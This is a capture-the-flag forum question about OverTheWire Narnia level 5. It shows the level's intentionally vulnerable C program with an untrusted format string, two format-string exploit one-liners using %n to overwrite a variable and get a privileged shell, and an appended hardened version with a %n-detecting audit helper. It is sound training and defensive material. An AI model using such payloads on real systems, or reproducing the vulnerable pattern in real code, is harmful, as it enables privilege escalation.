#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   /* setreuid(), geteuid() */

int main(int argc, char **argv){
    int i = 1;
    char buffer[64];

    /* argv[1] is passed as the format string itself: this is the bug the level is built around */
    snprintf(buffer, sizeof buffer, argv[1]);
    buffer[sizeof (buffer) - 1] = 0;
    printf("Change i's value from 1 -> 500. ");

    if(i==500){
        printf("GOOD\n");
        setreuid(geteuid(),geteuid());
        system("/bin/sh");
    }

    printf("No way...let me give you a hint!\n");
    /* strlen() returns size_t; cast so the argument matches %d */
    printf("buffer : [%s] (%d)\n", buffer, (int)strlen(buffer));
    printf ("i = %d (%p)\n", i, (void *)&i);
    return 0;
}

Hi! I'm working on a CTF exercise (OverTheWire, level 5, Narnia). Here is the code that I've tried, but I don't understand why the second option isn't working.
This one works:
./narnia5 $(python -c 'print "\xe0\xd6\xff\xff" + "%496x%1$n"')
With this one I get a segfault:
./narnia5 $(python -c 'print "\xe0\xd6\xff\xff" + "%496x%n"')
The principle is the same in both variants: you pass the address, and the %n specifier reads the amount of bytes passed; because the address takes 4 bytes, we add 496 bytes with padding. In both of them %n will read the next address on the stack, as I understand. Thanks for your answers.
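
Added example (not part of the original post and not OverTheWire's code): the hardened form of the snprintf call in the program above, next to a small audit helper that flags %n conversions in untrusted text, in both the plain and the positional "%1$n" form. The function names copy_untrusted and count_n_conversions and the sample strings in main are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Hardened copy: the untrusted text is passed as data to a constant "%s"
 * format, so any conversions it contains are copied literally and never
 * interpreted. Returns 1 if the whole input fit, 0 if it was truncated. */
int copy_untrusted(char *dst, size_t dstlen, const char *untrusted)
{
    int n = snprintf(dst, dstlen, "%s", untrusted);
    return n >= 0 && (size_t)n < dstlen;
}

/* Audit helper (hypothetical): counts %n-family conversions in a string.
 * Handles the plain form "%n", the POSIX positional form "%<digits>$n",
 * and optional flags, width, precision and length modifiers ("%hhn").
 * "%%" is a literal percent sign and is skipped. */
int count_n_conversions(const char *s)
{
    int hits = 0;
    while ((s = strchr(s, '%')) != NULL) {
        s++;
        if (*s == '%') { s++; continue; }
        s += strspn(s, "0123456789$-+ #'*.");  /* position, flags, width, precision */
        s += strspn(s, "hljztL");              /* length modifiers */
        if (*s == 'n')
            hits++;
    }
    return hits;
}

int main(void)
{
    /* Constructed sample inputs: only the conversion part of each string. */
    const char *samples[] = { "%496x%1$n", "%496x%n", "100%% done, %s" };
    char out[64];

    for (size_t k = 0; k < sizeof samples / sizeof samples[0]; k++) {
        int fit = copy_untrusted(out, sizeof out, samples[k]);
        printf("copied [%s] fit=%d n-conversions=%d\n",
               out, fit, count_n_conversions(samples[k]));
    }
    return 0;
}
```

Compiling the original program with -Wformat -Wformat-security makes GCC and Clang warn about the non-literal format argument at the snprintf call.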